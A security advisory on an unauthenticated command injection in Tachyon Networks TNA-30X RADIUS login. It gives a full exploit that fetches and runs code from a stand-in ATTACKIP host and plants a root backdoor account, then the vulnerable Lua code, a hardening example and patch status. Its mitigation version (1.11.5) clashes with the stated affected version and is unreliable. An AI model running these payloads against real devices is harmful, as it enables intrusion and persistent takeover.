Tachyon-Networks - Unauthenticated RCE

Overview

During the authentication process, if the device has RADIUS authentication enabled, it is possible to perform a command injection due to incomplete sanitisation of user input within the RADIUS logic.

Using this vulnerability an unauthenticated user can execute any payload on the device.

Note: If this is performed on a subscriber module, it may be possible to repeat the attack against the access point as the impacted firmware exposes the access point via the bridge interface.

Impacted Firmwares

This has been tested on TNA-30X firmware 1.12.0 (beta 1), which introduced the RADIUS authentication system; older firmwares are not vulnerable.

This vulnerability only impacts configurations with RADIUS user authentication enabled.

Exploit Steps

  1. Prepare the desired payload in a file on the attack box; for example, create the below payload.sh file:
    echo 'support:$1$6Hzch.yD$ULugJ982Yb1D0g8zhqv3T.:0:0:level=0,first_login=false:/:/bin/ash' >> /etc/passwd; rm /etc/dropbear/dropbear_*; dropbear -R
    
  2. Start web server on the attack box (python3 -m http.server 80)
  3. Send the first stage (curl http://ATTACKIP/payload.sh | ash) to the /cgi.lua/login HTTP endpoint:
    curl -k -v 'https://TARGETIP/cgi.lua/login' -X POST -H 'Content-Type: application/json' --data-raw '{"username":"root","password":"$(curl http://ATTACKIP/payload.sh | ash)"}'
    
  4. The example payload.sh will have inserted a backdoor account called support with the password admin, and started an SSH server, allowing access over SSH with those credentials:
> ssh support@192.168.1.1
Warning: Permanently added '192.168.1.1' (ECDSA) to the list of known hosts.
support@192.168.1.1's password: 


BusyBox v1.31.1 () built-in shell (ash)


___ ____ ____ _  _ _   _ ____ _  _    _  _ ____ ___ _ _ _ ____ ____ _  _ ____ ®
 |  |__| |    |__|  \_/  |  | |\ |    |\ | |___  |  | | | |  | |__/ |_/  [__  
 |  |  | |___ |  |   |   |__| | \|    | \| |___  |  |_|_| |__| |  \ | \_ ___]

Tachyon Networks® (c) 2020-2024
https://tachyon-networks.com

1.12.0 rev 54500
root@tachyon-ptmp:~# 

Vulnerable Code

Below is a sample of the code responsible for the vulnerability. Some sanitisation is performed, but it does not cover all possible command injections: sh_param_clean escapes backslashes, single quotes and double quotes, yet leaves $ untouched, and the cleaned username and password are then interpolated into a double-quoted shell string, where $(...) is still expanded by the shell before radclient ever sees the value. Only sh_ss_clean, which is used for the server address and shared secret, escapes $.

authentication.lua

-- Need to clear out backslashes first, then replace " and $ chars with escaped versions
local function sh_ss_clean(str)
        return str:gsub("\\", "\\\\"):gsub("\"", "\\\""):gsub("[$]", "\\$")  
end

local function sh_param_clean(str)
        return str:gsub("\\", "\\\\"):gsub("'", "\\'"):gsub("\"", "\\\"")
end

local function radius_auth(address, name, pass, rad_params)
        local res = {
                success = false,
                method = "radius",
                timeout = false
        }
        
        local cmd = string.format(
                'printf %%s "User-Name=\'%s\',User-Password=\'%s\'" | ' ..
                 ' /usr/bin/radclient -F -r 1 %s:%d auth "%s" 2>&1',
                sh_param_clean(name), 
                sh_param_clean(pass), 
                sh_ss_clean(rad_params.auth_server1 or ""), 
                tonumber(rad_params.auth_port) or 1812, 
                sh_ss_clean(rad_params.auth_secret or ""))
        local results = sysio.read_pipe(cmd)
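
The hardening a practitioner would apply to the cleaner above, as an added Lua example that is not the vendor's code: the page's sh_param_clean beside a single-quote wrapper, both used to build the printf part of the radius_auth command (radclient pipe omitted), plus a small quote tracker that reports whether a $ would still reach the shell unquoted. ATTACKIP is the page's placeholder; sh_quote, build_cmd_vulnerable, build_cmd_hardened and has_expanding_dollar are names assumed here.

```lua
-- Vendor-style cleaner as shown on the page: escapes \ ' and " but not $.
local function sh_param_clean(str)
    return (str:gsub("\\", "\\\\"):gsub("'", "\\'"):gsub("\"", "\\\""))
end
-- Hardened: wrap the whole value in single quotes and rewrite each embedded
-- single quote as '\'' (close, escaped quote, reopen). Inside single quotes
-- a POSIX shell expands nothing, so $, backtick, \ and " are all literal.
local function sh_quote(str)
    return "'" .. (str:gsub("'", "'\\''")) .. "'"
end
-- Mirrors the page's cmd: values land inside a double-quoted shell string,
-- where $(...) is still command substitution.
local function build_cmd_vulnerable(name, pass)
    return string.format('printf %%s "User-Name=\'%s\',User-Password=\'%s\'"',
        sh_param_clean(name), sh_param_clean(pass))
end
-- Hardened: each value is its own single-quoted shell word; the radclient
-- attribute syntax is supplied by printf's format string instead.
local function build_cmd_hardened(name, pass)
    return string.format("printf \"User-Name='%%s',User-Password='%%s'\" %s %s",
        sh_quote(name), sh_quote(pass))
end
-- Minimal quote tracker: true if the command holds a $ that a POSIX shell
-- would expand (unquoted, or in double quotes and not backslash-escaped).
local function has_expanding_dollar(cmd)
    local in_single, in_double, i = false, false, 1
    while i <= #cmd do
        local c = cmd:sub(i, i)
        if in_single then
            if c == "'" then in_single = false end
        elseif c == "\\" then
            i = i + 1                          -- escaped char: skip it
        elseif c == "'" and not in_double then
            in_single = true
        elseif c == '"' then
            in_double = not in_double
        elseif c == "$" then
            return true
        end
        i = i + 1
    end
    return false
end

-- Self-checks using the password string from the exploit step above.
local name, pass = "root", "$(curl http://ATTACKIP/payload.sh | ash)"
assert(has_expanding_dollar(build_cmd_vulnerable(name, pass)))
assert(not has_expanding_dollar(build_cmd_hardened(name, pass)))
assert(not has_expanding_dollar(build_cmd_hardened("o'brien", pass)))
print(build_cmd_hardened(name, pass))
```

The tracker is a check for this specific construction, not a shell parser; the structural fix is to stop passing credentials through a shell at all and hand them to radclient as arguments or on stdin.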

Outcomes

After the disclosure report was submitted to Tachyon-Networks, the vulnerability was patched and new firmware was released.

No CVE IDs have been assigned as of this post.

Affected Products:

Tachyon-Network TNA and TNS series devices

Mitigation:

Update impacted devices to Version 1.11.5 or later.